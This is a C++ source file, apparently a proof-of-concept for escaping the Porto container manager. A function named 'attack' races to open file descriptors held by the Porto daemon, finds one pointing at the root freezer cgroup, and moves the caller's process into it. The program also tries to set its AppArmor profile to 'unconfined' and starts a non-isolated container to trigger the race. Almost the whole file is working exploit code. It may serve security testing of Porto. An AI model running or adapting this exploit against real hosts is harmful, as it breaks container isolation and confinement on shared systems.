#include <cerrno>
#include <sys/wait.h>
#include <fcntl.h>

#include <util/stream/output.h>
#include <util/stream/file.h>
#include <util/system/fs.h>
#include <util/datetime/base.h>
#include <util/folder/iterator.h>

#include <infra/porto/api/libporto.hpp>


int attack(int selfPid, int targetPid) {
    Cout << "Tracing process " << targetPid << Endl;

    auto semaphore_path = TString("/proc/") + ToString(targetPid) + "/status";
    int fd;
    for (;;) {
        fd = open(semaphore_path.c_str(), O_RDONLY);
        if (fd != -1) {
            close(fd);
            break;
        }
    }

    TString freezerPath;
    Cout << "Available fds: ";
    TDirIterator fdDir("/proc/" + ToString(targetPid) + "/fd");
    for (auto &&file : fdDir) {
        if (file.fts_pathlen == file.fts_namelen) {
            continue;
        }

        TString fdPath = file.fts_path;
        if (fdPath.empty()) {
            continue;
        }

        if (file.fts_info == FTS_SL) {
            auto realPath = NFs::ReadLink(fdPath);
            Cout << fdPath << " -> " << realPath << Endl;
            if (realPath == "/sys/fs/cgroup/freezer") {
                freezerPath = fdPath;
                break;
            }
        }
    }

    if (!freezerPath) {
        Cout << "Failed to find freezer cgroup fd" << Endl;
        return 1;
    }

    Cout << "Found freezer cgroup fd: " << freezerPath << Endl;
    TFileOutput out(freezerPath + "/tasks");
    out.Write(ToString(selfPid));

    Cout << "Moved " << selfPid << " into root freezer cgroup" << Endl;
    return 0;
}

int main() {
    auto fd = open("/proc/self/attr/current", O_WRONLY);
    if (fd < 0) {
        Cerr << "open attr current failed:" << strerror(errno) << Endl;
       _exit(1);
    }
    Cout << "change apparmor profile " << write(fd, "changeprofile unconfined", sizeof("changeprofile unconfined")+1) << Endl;

    int selfPid = getppid();
    int targetPid = getpid() + 2;
    Cout << "Wait for portod with pid " << targetPid << Endl;

    int pid = fork();
    if (pid > 0) {
        attack(selfPid, targetPid);
        _exit(0);
    } else {
        sleep(1);
        TString containerName = "test" + ToString(Now().TimeT());
        Cout << "Create container: " << containerName << Endl;

        Porto::TPortoApi api;
        Y_UNUSED(api.Create(containerName));
        Y_UNUSED(api.SetProperty(containerName, "command", "/bin/sleep 3600"));
        Y_UNUSED(api.SetProperty(containerName, "isolate", "false"));

        Cout << "Start&Wait container: " << containerName << Endl;
        Y_UNUSED(api.Start(containerName));
        TString state;
        Y_UNUSED(api.WaitContainer(containerName, state));
        Cout << "result state: " << state << Endl;
    }

    waitpid(pid, nullptr, 0);
}
